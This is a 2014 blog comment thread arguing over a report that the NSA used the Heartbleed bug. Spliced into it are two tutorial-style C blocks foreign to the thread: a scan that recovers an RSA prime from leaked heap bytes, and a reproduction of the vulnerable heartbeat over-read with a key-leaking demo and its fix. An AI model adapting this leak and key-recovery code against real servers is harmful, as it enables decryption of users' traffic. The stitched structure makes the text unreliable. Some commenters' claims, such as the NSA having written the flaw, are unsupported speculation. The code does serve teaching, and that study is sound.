The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said. […]
Putting the Heartbleed bug in its arsenal, the NSA was able to obtain passwords and other basic data that are the building blocks of the sophisticated hacking operations at the core of its mission, but at a cost. Millions of ordinary users were left vulnerable to attack from other nations’ intelligence arms and criminal hackers.
“It flies in the face of the agency’s comments that defense comes first,” said Jason Healey, director of the cyber statecraft initiative at the Atlantic Council and a former Air Force cyber officer. “They are going to be completely shredded by the computer security community for this.”
At some point the NSA’s computer security mission should trump their eavesdropping mission. I would have thought that point would have been when the bulk of our networking and finance infrastructure was exposed to every hacker in the world. Since that wasn’t the case in one of the most serious and real security breaches in the history of the Internet, the obvious conclusion is that the NSA puts absolute primacy on their ability to eavesdrop, the security of US citizens and corporations be damned.
Mnemosyne
If you need to know which sites have been patched and are ready for you to change your password, CNET has a list.
J.Ty
I’m frankly a little surprised they didn’t write the bug themselves. Wouldn’t have been the first time they meddled in open-source crypto affairs.
DocSardonic
OT: Looks like James “Jimmy the Pimple” O’Keefe got himself a scalp in Wisconsin…. http://talkingpointsmemo.com/livewire/mike-ellis-james-okeefe Don’t know enough about Wisconsin’s election laws as far as filing paper work but if the deadline has passed it may turn out to be an own goal since there is no primary challenger.
Cervantes
Don’t be silly. What is your security — and yours — and yours — as compared to the nation’s? Some degree of sacrifice is necessary. Ask not what your country can do for you and all that.
c u n d gulag
Why is that I’m not at all surprised?
Once you set up a security operation, that operation’s continued existence becomes that organization’s first priority.
Anton Sirius
That’s progress, I suppose. Rather than relying on one anonymous, off-the-record source, Riley verified the story with a second anonymous, off-the-record source.
ranchandsyrup
From the NSA Public Affairs Office: Statement: NSA was not aware of the recently identified Heartbleed vulnerability until it was made public.
ORly?
Sinnach
Ah, anonymous unquotable sources saying the exact things we wanted to hear and guaranteeing thousands of page clicks. Truly the gold standard of modern journalism.
catclub
@Mnemosyne: There are also ssllabs and other sites, which will test the websites you are interested in.
Schneier and Atlantic have links to what you need to do, which is change passwords, even if your needed site is not yet fixed. When it is fixed you will need to change again. Why? This way the last two years of collections are made useless and only the last few days collections against websites are useful.
It is a probability argument that the long period of unknown harm is more dangerous than the presumably short period of known risk.
Schlemizel
The odds are high that if NSA knew about it so did the Chinese Army and the Russian mafia, this is unforgivable.
Roger Moore
I think the computer security mission should trump the eavesdropping mission unless the vulnerability is one known not to affect American users. That may happen more subtly than making an announcement that we’ve found a bug- the DES business* is a good example- but defense should take priority. There are enough ways of breaking in and stealing information that patching bugs shouldn’t interfere with the NSA too badly. One of the things that showed up in the Snowden documents was a whole set of “tailored access operations” hardware designed to place surreptitious snooping devices in enemy networks, exactly the kind of skulduggery that spy agencies are supposed to be engaged in.
*When a previous generation encryption standard called DES was first proposed back in the 1970s, the NSA made some mysterious suggestions about tweaking some of the constants in the formula. It turns out that NSA had developed a new method of cryptanalysis that worked on the method as originally proposed but not after the tweaks. People figured this out quite a while later when the academic cryptography community re-invented the NSA’s method and realized that the tweaks eliminated the vulnerability.
Bill Arnold
That bloomberg piece left me fuming. Whether or not it was true, the asymmetry of the problem is real.
A possible fix would be for the IT industry to support open research into exploit generation tooling (“Automatic Exploit Generation” in the literature), maybe with big monetary prizes and competitions if they can be made resistant to gaming, and to encourage widespread usage of such tooling to check existing open source code and changes to open source code. A few $10s of millions would go a long way. Does anybody know of any such proposals?
Schlemizel
@DocSardonic:
My guess would be that there is some provision for replacing a candidate, although it may only be after death so I am not sure. OTOH it sure is fun to think of the smirking bastards who thought this little prick was cool now have to worry they may not be pure enough to escape his slimy paw.
Villago Delenda Est
Heads need to roll at the NSA for this.
The “Security” in their name is a joke.
roc
@Schlemizel: It’s entirely possible that they only had reason to believe other agencies were leveraging the bug recently. Which may be why, after two years of being in the wild, two different security researchers found this same exact vulnerability on the same exact day.
Or maybe it’s just coincidence, and those researchers were simply carefully reviewing every SSL implementation after gotofail was in the news.
It could be coincidence.
Bill Arnold
@efgoldman:
OK that was funny.
(Search google for “the only part of government that actually listens” t-shirt if you want one.)
japa21
If this story is accurate, and that is a big if based upon previous NSA stories, they should be held to account for not letting people know. I will wait for something that actually backs up the story.
Belafon
I realize I’m pulling from wikipedia, but where in
does “must ensure the protection of US personal computers” fit?
different-church-lady
@Belafon:
Roger Moore
@roc:
Or they published it on the same day. In a lot of cases, researchers who discover a vulnerability will keep it quiet to give the vendor a chance to patch the vulnerability and come up with other mitigation methods. The whole thing, including a description of the exploit, the patches, and any mitigation methods are published at the same time to limit the time when the vulnerability is well known but unpatched. If more than one researcher discovers the vulnerability independently, they will both have a chance to publish simultaneously.
Villago Delenda Est
@Belafon: A HUGE part of the NSA’s mission is providing crypto for the military and the rest of the government. That would include, without much of a stretch, all communications security (COMSEC) related issues. If they in fact knew of a vulnerability in SSL and did nothing about it, this is more or less the equivalent of the USAF ignoring incoming planes about to bomb the country.
Roger Moore
@Belafon:
The part you’re missing is
Since there are almost certainly some government computers using OpenSSL- healthcare.gov is on the list of sites that may be vulnerable, for instance- they had a responsibility to do something about this bug when they found out about it.
Mandalay
@japa21:
Dead right. It is a big if. The source of the story is two anonymous people, there is no supporting evidence, and the claim cannot be refuted (How can the NSA possibly prove that they did nothing about this two years ago?).
If there was a negative story being posted about Obama with that level of credibility the BJ community would rip it to shreds.
As always, fuck the NSA. But unless something more substantive emerges about what they allegedly did based on the bug, then the NSA aspect of this story is a nothingburger.
srv
@Roger Moore: It will be hysterical if the exploit was used on healthcare.gov
Unless they absolutely know otherwise, someone should start prepping the public for that shitshow. Dozens of state exchanges and what not, the odds are not good.
Bill Arnold
Agreed, though Bloomberg has a reputation for being more reliable about leaks than most other business publications.
Baud
@Mandalay:
Agree. Being skeptical of the media (and I am) means being skeptical of the media. No exceptions for stories that reinforce our world view.
max
At some point the NSA’s computer security mission should trump their eavesdropping mission.
Concur with Mr. Moore. They are part of the Department of Defense, which means you do some defending.
I would have thought that point would have been when the bulk of our networking and finance infrastructure was exposed to every hacker in the world. Since that wasn’t the case in one of the most serious and real security breaches in the history of the Internet, the obvious conclusion is that the NSA puts absolute primacy on their ability to eavesdrop, the security of US citizens and corporations be damned.
Well, given what that fuckhead Hayden said, it seems pretty clear that at some point (1999 or earlier), the NSA decided it wasn’t interested in defense anymore. Post-911, it seems pretty clear they embraced the Gospel of the DC Idiotocracy and decided the way to get the defense bucks was to go completely over to the offense against everybody, including Americans. (If anyone recalls, DC post-911 was bubbling over about how we needed humint and we needed the CIA to be proactive and aggressive, and it sure seems like the NSA wanted in on the game.) It certainly seems General Alexander was totally committed to the concept, when he wasn’t blowing money on building Star Trek bridges and playing Captain Kirk.
max
[‘At this point it seems that if we want to protect American cyber security we’re going to need an entire new agency.’]
azlib
The NSA was certainly in a good position to exploit this specific vulnerability, since they have the eavesdropping equipment installed in the NAPs already.
A common criminal who knew about this bug would probably hang out at a local Starbucks with a laptop and sniff SSL packet streams on the open wireless network and then crack the encryption with the private keys it obtained earlier.
Mandalay
@Bill Arnold:
It’s worth pointing out that Bloomberg carefully titled the article linked in the OP as “NSA Said to Exploit Heartbleed Bug for Intelligence for Years” rather than “NSA Exploited Heartbleed Bug for Intelligence for Years”.
So Bloomberg knows it is a suspect claim, but they decided to go ahead and publish it anyway.
Ernest Pikeman
I see the NSA bootlickers are already denying even the possibility that this could be true. Let’s see how soon “first world problem” and “dudebro” are trotted out, as “clickbait” was already deployed.
If you think an organization with a budget of billions, that employs thousands of cryptographers and security analysts, with a mission to find vulnerabilities, would NOT inspect every committed change into the most widely used crypto code library in the world, you are nuts. That’s their fucking job. It might take one competent guy some hours per day. This TLS heartbeat was a new feature – of course they (and the PLA, and a whole bunch of more unsavory types) would check it out. Some Snowden docs hinted that NSA could decrypt SSL traffic. This may be how, by getting hold of the private keys using Heartbleed.
The positive thing is that since the spooks are collecting vulnerabilities, it means the fundamentals of (at least some) encryption algorithms in use nowadays are probably OK. The OpenSSL project has been found unforgivably lax in their code review though. Hope this makes it better.
muddy
This is Al Gore’s fault for inventing the internet.
Baud
@Ernest Pikeman:
Please provide an example.
J.Ty
Sheesh, fine, I’ll be skeptical. It still wouldn’t be surprising if one or more groups knew of the vulnerability and didn’t tell anybody-and not just state actors, either. The knowledge would give you a ridiculous amount of power.
Ernest Pikeman
@Baud: See Anton Sirius and sinnach above.
srv
@Ernest Pikeman: IDK if it would be more of a scandal they did know or at $10’s of billions per year they didn’t know.
Mandalay
@Ernest Pikeman:
Not even close. It would be more accurate to state that those who distrust our media are denying the possibility that this must be true.
Anyone assuming that media allegations made against the NSA must be true without a shred of supporting evidence is highly gullible. If the shoe fits wear it.
Mnemosyne
If — and this is still a very big IF — this is true, we are about to see a major war between the NSA and the Department of Defense, because the Army, Navy, Air Force and Marines are going to be PISSED that the NSA put the armed forces at risk so the NSA could play spy games.
That’s the problem with complaining about “the government” — if this is true, it’s going to pit different parts of the government against each other. The DoD ain’t gonna shrug it off.
Ernest Pikeman
@srv: Heh, indeed.
(Always wanted to say that. Strike one line off the old bucket list!)
Higgs Boson's Mate
@Mandalay:
So please list for me what you actually know about the NSA’s methods and be certain to reassure me that no government agency has ever, ever, acted in ways that might negatively affect those of us who pay the freight.
ya’ fucking tool.
guachi
I applaud the NSA-haters in thinking that the NSA is so awesome they found out about a bug up to two years before anyone else did.
I’ll let my fellow NSA employees know that their fellow citizens think so highly of their skills.
It’s certainly possible the NSA previously knew about this. But I’d not think that telling the whole world of the vulnerability was part of their job. Protecting both classified and unclassified defense networks, sure. But not a private company. But it might have been worth it if they suspected that other countries knew of the exploit.
Bob In Portland
Does anyone remember Danny Casolaro and the PROMIS software?
Higgs Boson's Mate
@Bob In Portland:
Does anyone remember SATAN? Worked with the guy who wrote it. My company decided to hire an accomplished hacker to fight off the less-accomplished ones.
Carolinus
@mistermix:
You should probably add to your post that the White House, DNI and NSA have all flatly & unequivocally denied this anomalously sourced allegation.
Mandalay
@Higgs Boson’s Mate:
You are proving the very point I made in post #24: “How can the NSA possibly prove that they did nothing about this two years ago?”.
Do you think that the claim made against the NSA by two unnamed sources is automatically true?
If you blindly believe the claim of two unnamed sources because it dovetails with your belief system then you are the fucking tool.
Ernest Pikeman
@Carolinus: Hehe, “anomalously sourced”. The Bloomberg article says:
Not quite a flat denial. You have links?
dr. bloor
They learned J. Edgar Hoover’s secret to longevity very well.
Roger Moore
@Ernest Pikeman:
That looks more like criticism of the quality of journalism- a valid critique that it’s based on anonymous sources telling people something they want to hear- not claiming that it’s impossible that the NSA is actually guilty. If you can’t tell the difference between “that’s impossible” and “this article is crappy evidence”, you’re about as credible as the article in question.
zoot
I hope…I just hope that when the big cyber attack/collapse occurs and the nation is in the toilet that they take their fvcking aircraft carriers, F-22 jet planes, stealth bombers, M-1 tanks and all the other useless crap they wasted $TRILLIONS on fighting the last war and pretending they all have big dicks, and shove them right up the a*ses of every senior official in the NSA and military.
Ernest Pikeman
@guachi: So you’re saying it’s not possible that a multibillion-dollar agency would have been able to keep up with a project that averages two code commits per day (about 11800 commits over 15 years – haven’t bothered to look at yearly stats).
Especially when it’s something that is very central to their mission.
Hmm.
I’m not saying NSA is super capable (they have middle managers like everybody else), but come on.
Carolinus
@Ernest Pikeman:
http://bnowire.com/inbox/?id=2307
http://www.nbcnews.com/tech/security/nsa-denies-it-used-heartbleed-bug-gather-intelligence-n78356
MomSense
@Mandalay:
Who are you and what have you done with Mandalay??
This Bloomberg story is based completely on anonymous sourcing. I don’t trust the NSA but c’mon this is not credible.
Baud
@Ernest Pikeman:
I read their comments the same way Roger Moore does, but I appreciate the response.
Cacti
@Mandalay:
Dead right. It is a big if. The source of the story is two anonymous people, there is no supporting evidence, and the claim cannot be refuted
Why you gotta go harsh on mistermix’s “ARGLEBLARGLE NSA!” for?
Higgs Boson's Mate
@Mandalay:
My experience of life is that government agencies eventually lose sight of anything other than self-perpetuation. Any method that advances the agency becomes okay. So, yes, I believe that the NSA used an exploitable bug and yes, you’re still a fucking tool.
guachi
@Ernest Pikeman:
Uhh…. what?
You wrote, “So you’re saying it’s not possible …”
This is what I wrote, “It’s certainly possible the NSA previously knew about this.”
Do you have reading comprehension problems?
Cacti
At some point the NSA’s computer security mission should trump their eavesdropping mission
And how do you square this particular circle with your recent “how dare the NSA gather intel on Chinese corporations!” screed?
srv
The DNI responds
tl;dr: We iz incompetent
Carolinus
@Carolinus:
Oops, I forgot to add the DNI. Here’s that statement:
http://arstechnica.com/security/2014/04/nsa-used-heartbleed-nearly-from-the-start-report-claims/
Fair Economist
If the NSA *didn’t* know about this they should be closed down for incompetence. As spies, they are *supposed* to be looking for ways to crack security, and this kind of overflow bug is actually a fairly standard way to crack security.
Um – and who are you expecting to go on the record about NSA misdeeds? Snowden had it right in that nobody’s going to dare do that if they aren’t already on a flight out of the country.
Mandalay
@Higgs Boson’s Mate:
It takes a brave man to admit that he blindly accepts the word of two anonymous sources who provide no evidence. Good for you!
Mnemosyne
@Carolinus:
Again, this is why I said that IF — big if — this was true, it would cause a shitstorm inside the government the likes of which has never been seen before. The Social Security Administration uses OpenSSL. So does the IRS. And pretty much any other government agency that moves money around. Does anyone really think that the SSA and the IRS are going to think it was no big deal for them not to be told about this?
Anton Sirius
@Ernest Pikeman:
Nope, try again. I said no such thing.
Bill Arnold
@Carolinus:
That’s a pretty clear denial. Do you believe it? (I tend to believe the NSA/DNI iff they make extremely clear statements that can’t be parsed in multiple ways.)
srv
@Fair Economist: You know what this really proves?
[queue ominous music]
They didn’t need Heartbleed.
Cacti
Get your mistermix NSA rant! Hot and fresh! Now 100 percent fact-free, with an extra serving of breathless speculation.
Higgs Boson's Mate
@Mandalay:
I signed my life away before you were born, kid. I’m not particularly clever but I do have some experience of government agencies.
Carolinus
@Bill Arnold:
Yes. Just the title of the Bloomberg article makes it clear they have no other evidence beyond the two background claims. Bloomberg is equivocating while the gov’t is being unequivocal in its push-back on multiple fronts.
Comrade Mary
@Higgs Boson’s Mate: Dan Farmer! An old friend of mine from high school used to hang out with him and Muffy (geek BDSM scene in SF).
Ernest Pikeman
@guachi:
I was responding to this:
Then you backtracked and said this:
Followed by arglebargle that NSA should tell DOD etc but not private companies about a bug in an OPEN SOURCE library. How would that work, exactly?
CONGRATULATIONS!
@Belafon: Weirdly enough, it’s not in there. It’s really not their job. That job always has been and always will be domestic and foreign spying.
Terrifyingly enough, no agency has such a charter.
And we’re twenty years past the time when we need one.
Baud
@Fair Economist:
Why didn’t one of the large tech companies discover this sooner? Don’t they care about this stuff?
Higgs Boson's Mate
@Comrade Mary:
You got it. Dan knew more ways to break the internet than I can count.
ETA: No mention of router vulnerabilities of which there are so many.
Cacti
Speaking of Bloomberg News…
Remember back in November when they fired that reporter who spilled the beans on their editorial policy of spiking stories that “might anger China”?
Bill Arnold
@Carolinus:
Is there a .gov link for this? (Didn’t find one in a brief search.)
Anton Sirius
@srv:
It’s “cue”, unless you have a lot of music lined up.
Were you thinking sinister organ, creepy theremin, or Oldfield-esque noodling?
Thlayli
@Mandalay:
Of course it’s true, because … the government, amirite?
Besides, if the NSA did know about this, how come Saint Edward the Blower-of-Whistles didn’t tell us?
Higgs Boson's Mate
@Thlayli:
Fuck off and die. Thank you.
jl
@Anton Sirius:
Spooky music: Walker, Theremin.
https://www.youtube.com/watch?v=XXOVJsuXerc
Mandalay
@Higgs Boson’s Mate:
Shame you didn’t bother to gain some experience of media bullshit.
gwangung
That the NSA knew of the bug and was exploiting it? Possible, very possible.
That they knew of it and DIDN’T let other government agencies know? Including DOD, and other defense agencies? Sorry, but that doesn’t pass the sniff test. They want to snoop WITHOUT allowing others to snoop the same way.
Ernest Pikeman
For the record, I’m not an “NSA hater” or whatever. They are a fact of life, and a fact I can’t really do anything about. I don’t think they are all that interested in me or my secrets. I’m not a threat. They have huge resources, and a lot of smart people. They could have a valid mission, but it seems they’ve been taken over by mission creep and bad management.
Reason I’m prepared to believe they *must* have known about this is that if they didn’t, what the hell are we paying them for? It does seem that their management is incompetent, as shown by L’Affaire Snowden. How in the hell is it possible that a tech contractor can exfiltrate huge amounts of classified information? I’m a sysadmin and I’ve set up monitoring and access controls for sysadmins’ access to data. It’s not that hard. Even my home network has boobytraps just for fun. If management heads didn’t roll after Snowden, it’s pretty hopeless. All I saw were reports that they fired techies. Yeah, that’ll show ’em.
If they really didn’t know? I want some management hauled in front of the Senate and asked why the hell not?
Mnemosyne
@gwangung:
To put it another way, if you work for the NSA, do you really want the IRS finding out that you screwed them over?
Mnemosyne
@Ernest Pikeman:
You do realize that’s a totally different question, right?
And, as I’ve said in other threads, the recent actions of the LA Sheriff’s Department make me lean much more to the side of “incompetence” rather than “conspiracy” when it comes to law enforcement. I have yet to see any of this ruthless efficiency that everyone keeps telling me I need to fear from the NSA.
srv
@Anton Sirius: Thx
I think Edvard Artemyev has all that and more, in proper context, 42 years ago.
Ernest Pikeman
@Mnemosyne: Sorry, I don’t see how some idiot LAPD cops have any relevance to a federal spook agency. NSA is not law enforcement.
I don’t think people are that afraid of the “ruthless efficiency” of NSA – that’s not the issue. The combination of narrow-and-deep technological competence with management incompetence is worrisome, as it invites abuse. And the fact they can just mumble “Security” and people stop questioning.
Origuy
I don’t understand what good the Heartbleed bug is to the NSA anyway. As I understand it, thanks to XKCD and other places, you send a request to echo a message with an incorrect message length and a broken server returns more data than you sent. Yes, that data is random garbage that may contain passwords, but they could be anyone’s passwords. The chance that the NSA could get back the password for a person of interest is vanishingly small.
Nathanael
If Keith Alexander was actually a Russian mole working for Vladimir Putin, he’d run the NSA *exactly the way he’s running it now*.
People should seriously think about that, and start a campaign to get Alexander and Clapper arrested for treason.
Cassidy
NSA denies it.
Nathanael
@Carolinus: DNI Clapper has confessed to committing perjury by lying to Congress. Obviously you can’t believe anything he says. Of course he’s going to deny the truth, again.
Just like a Russian mole would. The Russians are probably astounded that they’re still getting away with having moles running the CIA and NSA even *after* Snowden exposed them. ;-) It explains why Putin is completely unafraid of the US!
NR
Can’t wait for all you commenters to tell me what a nothingburger this is. It’s all a great big nothingburger, right?
Mnemosyne
@Ernest Pikeman:
So that magically makes the NSA competent?
Roger Moore
@Origuy:
The key is that you can keep asking for data until you read everything that’s there. Any piece of information that was in the server’s memory is vulnerable. That includes the server’s private encryption keys, which are basically the key to the store. If you have those keys, you can listen in to their communications even when they’re using encryption. If you have those keys and they aren’t using forward security, you can go back and decrypt previous communications that you stored but weren’t able to read at the time. It’s a genuine nightmare.
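What “the server’s private encryption keys” in leaked memory looks like in practice, as an added C example that is not code from the original post or from OpenSSL: the leaked bytes rarely contain a tidy PEM file, but they can contain one of the two primes of the server’s RSA key as a raw little-endian limb, and every window of leaked bytes can be tested against the server’s public modulus by trial division. TOY_P, TOY_Q, the leaked buffer and SECRET_OFFSET are constructed, 32-bit values chosen so the arithmetic fits in uint64_t; a real key has 1024-bit or larger factors and needs bignum arithmetic and 128- or 256-byte windows, but the scan is the same.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Toy RSA modulus built from two 32-bit primes so that everything fits in
 * uint64_t. Constructed for this example; a real key has 1024-bit or larger
 * factors and needs bignum arithmetic, but the scan below is unchanged. */
static const uint64_t TOY_P = 4294967291ULL;            /* 2^32 - 5  */
static const uint64_t TOY_Q = 4294967279ULL;            /* 2^32 - 17 */
#define TOY_N (TOY_P * TOY_Q)                           /* the public modulus */

/* Constructed stand-in for one heartbeat response: junk bytes with a
 * little-endian copy of p at SECRET_OFFSET, the way a BIGNUM limb sits in
 * heap memory on x86. Nothing marks it; only arithmetic can find it. */
#define LEAK_LEN      96
#define SECRET_OFFSET 41
static unsigned char leaked[LEAK_LEN];

static void build_leak(void)
{
    for (size_t i = 0; i < LEAK_LEN; i++)
        leaked[i] = (unsigned char)(i * 37 + 11);          /* deterministic junk */
    for (int b = 0; b < 4; b++)
        leaked[SECRET_OFFSET + b] = (unsigned char)(TOY_P >> (8 * b));
}

/* Slide a 4-byte window over the leak and test each value against the
 * public modulus. A semiprime has no non-trivial divisors other than its
 * two primes, so a hit is never a false positive. Returns the window offset
 * and stores the factor in *factor, or -1 if no window divides n. */
static long scan_for_factor(const unsigned char *buf, size_t len,
                            uint64_t n, uint64_t *factor)
{
    for (size_t i = 0; i + 4 <= len; i++) {
        uint64_t cand = 0;
        for (int b = 3; b >= 0; b--)                    /* little-endian read */
            cand = (cand << 8) | buf[i + b];
        if (cand < 2 || cand == n) continue;            /* trivial divisors */
        if (n % cand == 0) { *factor = cand; return (long)i; }
    }
    return -1;
}

struct recovered { long offset; uint64_t p, q; };

/* Build the leak, recover one prime from it, derive the other by division.
 * offset is -1 if nothing was found (the real answer then is: ask again,
 * the next 64 KB of heap may contain it). */
struct recovered recover_key_demo(void)
{
    struct recovered r = { -1, 0, 0 };
    build_leak();
    uint64_t p = 0;
    long off = scan_for_factor(leaked, LEAK_LEN, TOY_N, &p);
    if (off < 0) return r;
    r.offset = off;
    r.p = p;
    r.q = TOY_N / p;          /* with p and q known, d follows from e as usual */
    return r;
}

int main(void)
{
    struct recovered r = recover_key_demo();
    printf("public n = %llu\n", (unsigned long long)TOY_N);
    if (r.offset < 0) { puts("no factor in this leak"); return 1; }
    printf("factor %llu at leak offset %ld; cofactor %llu; p*q == n: %s\n",
           (unsigned long long)r.p, r.offset, (unsigned long long)r.q,
           r.p * r.q == TOY_N ? "yes" : "no");
    return 0;
}
```

The check that does the work is `n % cand == 0` against the published modulus: it gives a definite yes or no per window, so an attacker can pull heartbeat responses in a loop and run this over each one until a window divides n. That is also why the exposure is not bounded by “which sessions were sniffed”: once p is out, every past RSA-key-exchange session whose traffic was recorded is readable.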
the Conster
So my husband, the Chief Technology Officer at a bank, has spent the last several days doing nothing but dealing with this. He has learned that this backdoor has been in place for over 2 years. He knows – as much as it’s possible to know – that it’s the NSA that created this breach. So, if it’s such an easy way to hack in now, why haven’t all of our accounts been wiped out and all of our credit cards been maxed out by the bad guys like Russian hackers and Chinese intelligence and who knows who? Because, he believes, the NSA is monitoring all unusual activity. This is what they can do – make sure that they know who and what is going on in internet commerce. If the bad guys try to do it, they also know they can be watched and tracked doing it, by the only agency on earth that can beat them at their game.
Roger Moore
@J.Ty:
That’s trickier than you might think. Any commit to a key Open Source program can be tracked down to its author. Since this kind of bug is likely to be caught eventually, you need to be very careful that the submission can’t be traced back to you. I suppose it’s possible that the guy who submitted this is actually an NSA mole, but given the rate at which actual bugs infest every piece of software, it seems more likely that it’s an ordinary bug.
Cervantes
@Roger Moore:
Yes, that’s the heart of the matter.
semperfi123
lol…just knew someone was going to try to involve the NSA somehow. Very low hanging clickbait fruit. Of course Snowden groupies like muckymux can’t resist taking a bite.
“two people familiar with the matter”. Sounds pretty convincing to me…sigh.
Belafon
@the Conster: Sorry, but your husband doesn’t know very much about software development then.
//
BTW, meet the US government agency charged with making our computers and internet secure: the US Computer Emergency Readiness Team (US-CERT), a part of Homeland Security.
Robert Sneddon
@Roger Moore: The problem was not the source code commit but that there was apparently no code review and no effective testing before this OpenSSL code was rolled out and implemented. It’s core code for security purposes on the entire internet worldwide and the code in question seems to have been given the same careful examination a CS101 student’s project would get from a teaching assistant doing the grading before bunking off for a pizza.
The bug is actually so bad it’s… it’s a bounds check failure permitting array overflows to return real data. Programmers stopped making that sort of a screwup in the 1990s after a bunch of security breaches happened because code didn’t verify arrays were properly bounded. There are tools to prevent bounds check failures slipping through code review. Compilers have switches that issue warnings or error out if bounds checking doesn’t happen or even force bounds checking at runtime automatically. There are languages that force bounds checking that can’t be disabled even if the programmer wigs out and screams “No bounds checking!” Test suites throw array overflows at alpha code and flag up warnings when the code returns real data rather than erroring out. And this still got through.
ruemara
I hate to point this out, but this is a pair of anonymous sources and they essentially are saying the immortal “could have” without documents that prove “really did”. Jesus. Too many people believe without having proof of what they believe. Not saying they did or didn’t, just that you can’t bitch out the right for fearmongering and then jump whole hog into “some people say” territory.
Roger Moore
@Robert Sneddon:
My understanding is that it’s actually the opposite of the traditional stack smashing array bounds check failure. In a regular array bounds failure, you give a program an input that’s longer than the space allotted for it. If the program doesn’t check there’s enough space, it can write past the end of the allotted space and overwrite memory that it shouldn’t be allowed to write. If you understand the program, you can overwrite an executable part of the code with your own code and take control of the system.
With the heartbleed attack, the attacker is allowed to provide a piece of information that’s supposed to be sent back and the length of the material that’s supposed to be returned. If the length that’s supposed to be returned is longer than the length of the information sent, OpenSSL would happily keep reading whatever followed what it was supposed to return. The problem is that it’s conceptually similar but sufficiently different in implementation that the automated tools and functions designed to defend against stack smashing attacks will miss it.
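The over-read Roger Moore and Robert Sneddon are arguing about, as an added C example that is not code from the original post or from OpenSSL itself: a cut-down handler in the shape of OpenSSL’s tls1_process_heartbeat, where the peer-supplied length field drives the memcpy and the real record length is never consulted, beside the same handler with the two bounds checks that the 1.0.1g fix put in front of the copy. process_memory, the two-byte “HI” payload and the private-key marker planted a few bytes behind the record are constructed for the example, and the response padding is zero-filled here where OpenSSL uses random bytes. Note that nothing is written out of bounds, which is exactly why stack-smashing protections never fire.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Heartbeat record body per RFC 6520:
 *   type(1) | payload_length(2, big-endian) | payload | padding(>=16 bytes) */
#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16

/* Constructed stand-in for server memory: the received record sits at
 * offset 0; a private-key string lives a few bytes behind it, as a heap
 * neighbour would. The attacker's record really carries 2 payload bytes. */
static unsigned char process_memory[256];
static const char secret_marker[] = "-----BEGIN RSA PRIVATE KEY-----";
#define REAL_RECORD_LEN (1 + 2 + 2 + HB_PADDING)   /* 21 bytes on the wire */

static void setup_memory(unsigned int claimed_payload_len)
{
    memset(process_memory, 'x', sizeof process_memory);
    process_memory[0] = TLS1_HB_REQUEST;
    process_memory[1] = (unsigned char)(claimed_payload_len >> 8);
    process_memory[2] = (unsigned char)(claimed_payload_len & 0xff);
    process_memory[3] = 'H';                  /* the only real payload bytes */
    process_memory[4] = 'I';
    memset(process_memory + 5, 0, HB_PADDING);
    memcpy(process_memory + 32, secret_marker, sizeof secret_marker - 1);
}

/* Shape of OpenSSL's tls1_process_heartbeat before 1.0.1g: the peer's
 * length field drives the memcpy and rec_len is never compared to it.
 * Returns bytes written to out, 0 for "silently discard", -1 on error. */
static int vulnerable_heartbeat(const unsigned char *rec, size_t rec_len,
                                unsigned char *out, size_t out_cap)
{
    const unsigned char *p = rec;
    unsigned char hbtype = *p++;
    unsigned int payload = ((unsigned int)p[0] << 8) | p[1];   /* n2s(p, payload) */
    const unsigned char *pl = p + 2;
    (void)rec_len;                              /* the bug: never consulted */

    if (hbtype != TLS1_HB_REQUEST) return -1;
    size_t resp_len = 1 + 2 + payload + HB_PADDING;
    if (resp_len > out_cap) return -1;

    unsigned char *bp = out;
    *bp++ = TLS1_HB_RESPONSE;
    *bp++ = (unsigned char)(payload >> 8);
    *bp++ = (unsigned char)(payload & 0xff);
    memcpy(bp, pl, payload);         /* over-read: copies whatever follows pl */
    bp += payload;
    memset(bp, 0, HB_PADDING);       /* OpenSSL fills this with random bytes */
    return (int)resp_len;
}

/* The fix added two checks in front of the same copy; the copy is unchanged. */
static int fixed_heartbeat(const unsigned char *rec, size_t rec_len,
                           unsigned char *out, size_t out_cap)
{
    if ((size_t)(1 + 2 + HB_PADDING) > rec_len) return 0;   /* runt: discard */
    unsigned int payload = ((unsigned int)rec[1] << 8) | rec[2];
    if ((size_t)(1 + 2 + payload + HB_PADDING) > rec_len) return 0; /* claimed > real */
    return vulnerable_heartbeat(rec, rec_len, out, out_cap);
}

/* memmem() is not portable, so search the response by hand. */
static int find_bytes(const unsigned char *hay, size_t hlen,
                      const char *needle, size_t nlen)
{
    for (size_t i = 0; nlen && i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0) return (int)i;
    return -1;
}

/* Attacker claims a 64-byte payload but sends 2 bytes in a 21-byte record.
 * Returns the offset of the private-key marker inside the response, or -1. */
int leak_demo(void)
{
    unsigned char resp[128];
    setup_memory(64);
    int n = vulnerable_heartbeat(process_memory, REAL_RECORD_LEN, resp, sizeof resp);
    if (n < 0) return -1;
    return find_bytes(resp, (size_t)n, secret_marker, sizeof secret_marker - 1);
}

/* Same 21-byte record through the fixed handler; returns its result. */
int fixed_demo(unsigned int claimed_payload_len)
{
    unsigned char resp[128];
    setup_memory(claimed_payload_len);
    return fixed_heartbeat(process_memory, REAL_RECORD_LEN, resp, sizeof resp);
}

int main(void)
{
    printf("vulnerable: marker at response offset %d\n", leak_demo());
    printf("fixed, claimed length 64: returns %d (discarded)\n", fixed_demo(64));
    printf("fixed, honest length 2: returns %d bytes\n", fixed_demo(2));
    return 0;
}
```

With the claimed length at its maximum of 65535 the same loop hands back nearly 64 KB of whatever sits after the record on each request, which is the “keep asking until you have read everything” point made earlier in the thread.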
different-church-lady
@guachi:
Aren’t you making a big assumption by asserting comprehension was the point of the endeavor?
different-church-lady
@Ernest Pikeman: Ah. So in other words you’re just flying on your gut, no different from anyone else, eh?
different-church-lady
@Origuy: Not even if they use that massive googlehertz super-duper computer with eleventy billion terraflops that’s using up all the water in Utah?
different-church-lady
@the Conster: I ain’t trying to sniff anything out here, but do you mind giving me the name of that bank so I can assure myself I’ll never open an account there?
different-church-lady
@Roger Moore: Considering that the guy responsible has already spoken up, drastic measures to find him will not be necessary.
liberal
@Roger Moore:
I don’t know the details, but if RS’s scenario were true, someone would have caught it earlier, I would assume—since presumably quite a few people compile from source and would have had the compiler flags he alludes to turned on.
Carolinus
@efgoldman:
Yeah, that never happened. Clapper copped to misunderstanding the question, bungling his response and then later clarifying the record in a letter to congress. I get that many here don’t believe him, and feel he perjured himself, but he’s never “confessed” that he did.
Carolinus
@the Conster:
